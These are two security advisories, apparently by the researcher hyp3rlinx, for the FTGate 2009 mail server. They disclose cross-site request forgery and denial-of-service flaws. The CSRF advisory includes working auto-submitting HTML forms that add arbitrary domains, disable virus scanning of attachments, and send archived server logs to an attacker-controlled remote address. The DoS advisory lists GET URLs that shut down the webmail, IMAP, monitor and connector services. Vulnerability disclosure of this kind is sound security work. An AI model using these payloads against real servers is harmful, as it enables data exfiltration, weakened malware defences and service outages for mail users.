1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 |
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-2009-CSRF.txt Vendor: ================================ www.ftgate.com Product: ======================================== FTGate 2009 SR3 May 13 2010 Build 6.4.00 Vulnerability Type: ================================= Cross site request forgery (CSRF) CVE Reference: ============== N/A Vulnerability Details: ===================== Multiple CSRF vectors exist within FTGate 2009 that allow us to add arbitrary remote domains, disable antivirus scanning for various Email file attachment types, and finally change settings to have archived server logs sent to our remote attacker controlled server for safe keeping. Exploit code(s): =============== CSRF(s): <!DOCTYPE> <html> <body onLoad="invertedcross()"> <script> function invertedcross(){ var e=document.getElementById('PUNKSNOTDEAD') e.submit() } </script> 1) add arbitrary domains: ------------------------- <form id="PUNKSNOTDEAD" action=" http://localhost:8089/webadmin/mailboxes/index.fts?action=save" method="post"> <input type="text" name="dname" value="hyp3rlinx.com" /> <input type="text" name="dtype" value="4" /> <input type="text" name="fname" value="*" /> <input type="text" name="action" value="domadd" /> <input type="text" name="domain" value="" /> <input type="text" name="newdomain" value="" /> </form> 2) sends archived logs to arbitrary remote server: -------------------------------------------------- <form id="PUNKSNOTDEAD" action=" http://localhost:8089/webadmin/config/archive.fts?action=save" method="post"> <input type="text" name="enable" value="on" /> <input type="text" name="path" value="C%3A%5CProgram+Files+%28x86%29%5CFTGate+2009%5CArchive" /> <input type="text" name="duration" value="0" /> <input type="text" name="external" value="on" /> <input type="text" name="extarcserver" value="6.6.6.0" /> </form> 3) disable virus scan for .jar or .exe files etc: ------------------------------------------------- Options to control handling of virus scanning for email attachments Virus Scanning Mode Operating mode of the virus scanner mode=0 to Disable Virus Scanning. <form id="PUNKSNOTDEAD" action=" http://localhost:8089/webadmin/filters/virus.fts" method="post"> <input type="text" name="action" value="add" /> <input type="text" name="mode" value="0" /> <input type="text" name="extension" value="dll" /> </form> </body> </html> Disclosure Timeline: ========================================================= Vendor Notification: September 29, 2015 October 1, 2015 : Public Disclosure Exploitation Technique: ======================= Remote Severity Level: ========================================================= High Description: ========================================================== Request Method(s):[+]POST Vulnerable Product: [+]FTGate 2009 SR3 May 13 2010 Build 6.4.00 Vulnerable Parameter(s):[+]domadd, extarcserver & mode #################################################### [+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-2009-DOS.txt Vendor: ================================ www.ftgate.com Product: ================================ FTGate 2009 SR3 May 13 2010 Build 6.4.000 Vulnerability Type: ======================= Denial of service (DOS) CVE Reference: ============== N/A Vulnerability Details: ===================== Multiple denial of service oppurtunities reside within FTGate 2009 that allow us to disrupt and shut down various FTGate services via GET requests by luring victimz to our website or get them to click our malicious linxs. Exploit code(s): =============== DOS: 1) shutdown solight web mail interface on port 80 http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=36 2) shutdown Monitor server port 8081 http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=35 3) shutdown FTGate connector server port 8090 listens on address 'Any' http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=38 4) shutdown IMAP server port 143 listening on 'Any' http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=33 Disclosure Timeline: ========================================================= Vendor Notification: September 29, 2015 October 1, 2015 : Public Disclosure Exploitation Technique: ======================= Remote Severity Level: ========================================================= Medium Description: ========================================================== Request Method(s):[+]GET Vulnerable Product: [+]FTGate 2009 SR3 May 13 2010 Build 6.4.000 Vulnerable Parameter(s):[+]action, id =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx |